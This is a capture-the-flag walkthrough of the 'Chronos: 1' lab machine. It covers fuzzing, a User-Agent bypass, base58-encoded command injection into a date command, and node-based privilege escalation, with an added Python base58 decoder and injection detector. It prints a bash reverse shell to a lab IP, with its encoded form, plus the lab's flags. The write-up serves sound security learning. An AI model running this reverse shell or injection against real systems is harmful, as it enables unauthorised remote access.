Last updated: 15 Apr 24 09:28:02 (UTC)
Write-Up chronos
Chronos: 1
By Lawcky 18/01/24
Introduction
Chronos
Difficulty: Medium
Additional info:
Name: Chronos: 1
Release date: 9 Aug 2021
Author: AL1ENUM
Series: Chronos
|NOTE| the full scan outputs are not copied here because they would be far too voluminous; they are linked separately.
In this write-up
- nmap
- nikto
- ffuf
- base58
- node-JS
- node SUID
Write-Up
FUZZING
Fuzzing with ffuf on: "/FUZZ", "/FUZZ.txt", "/.FUZZ", "/.FUZZ.txt"
ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://192.168.1.16/FUZZ
In the source code of the index page on port 8000 we see the hostname chronos.local, so we add it to /etc/hosts:
echo '192.168.1.16 chronos.local' >> /etc/hosts
The default page changes with the new hosts entry.
Access to the specific page is denied because the server checks the User-Agent header, as we can see here.
Let's connect with this User-Agent.
After changing the User-Agent to Chronos we can access the page.
Now let's decode the URL format.
This is an argument for the Linux date command.
Chronos-related issue
For some reason the browser kept crashing; after each injected command the web server crashes and the VM has to be restarted, which means we get one try before a reset is needed.
RCE
We know that the date command is executed and that its arguments are encoded in base58,
so let's encode a reverse shell in base58 and run it on the website.
;bash -c 'bash -i >& /dev/tcp/192.168.1.253/4444 0>&1'
Encoded, it is:
5nhYKfQBzH6BmbLsTqeyjoqpNb5tSzqVixeEC3bDRyTxC4tyjvv9YtbLU8UNTJmSgeJbVbayC2
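To check what the date endpoint is actually being asked to run, here is an added example (not from the original write-up) that base58-decodes the request parameter and flags values carrying shell metacharacters, which is the check a WAF rule or log review would apply; the parameter name "format", the sample URLs and the test inputs are assumptions.

```python
# Added example: base58 codec (Bitcoin alphabet) plus a detection check for
# command-injection attempts in a base58-encoded "date" argument.
# The parameter name "format" is an assumption, not taken from the write-up.
from typing import Optional
from urllib.parse import parse_qs, urlparse

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58encode(data: bytes) -> str:
    # Each leading zero byte becomes a leading '1'; the rest is base-58 digits.
    pad = len(data) - len(data.lstrip(b"\x00"))
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = ALPHABET[rem] + out
    return "1" * pad + out


def b58decode(text: str) -> bytes:
    # Inverse of b58encode; raises ValueError on a character outside the alphabet.
    pad = len(text) - len(text.lstrip("1"))
    n = 0
    for ch in text:
        n = n * 58 + ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return b"\x00" * pad + body


# Characters that let an argument escape the intended `date` invocation.
SHELL_META = (";", "|", "&", "$(", "`", "\n")


def injected_date_arg(url: str, param: str = "format") -> Optional[str]:
    """Decode the base58 parameter of a request URL and return the decoded
    argument if it contains shell metacharacters, otherwise None."""
    values = parse_qs(urlparse(url).query).get(param)
    if not values:
        return None
    try:
        decoded = b58decode(values[0]).decode("utf-8", "replace")
    except ValueError:  # not valid base58: leave it to other checks
        return None
    return decoded if any(m in decoded for m in SHELL_META) else None
```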
Privilege Escalation
From www-data to user
User imera
Using the Node.js file upload service we can upload a reverse shell.
First flag found: byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK
Privilege Escalation
From imera to root
sudo -l
Using the node GTFOBins entry.
Second flag found: YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK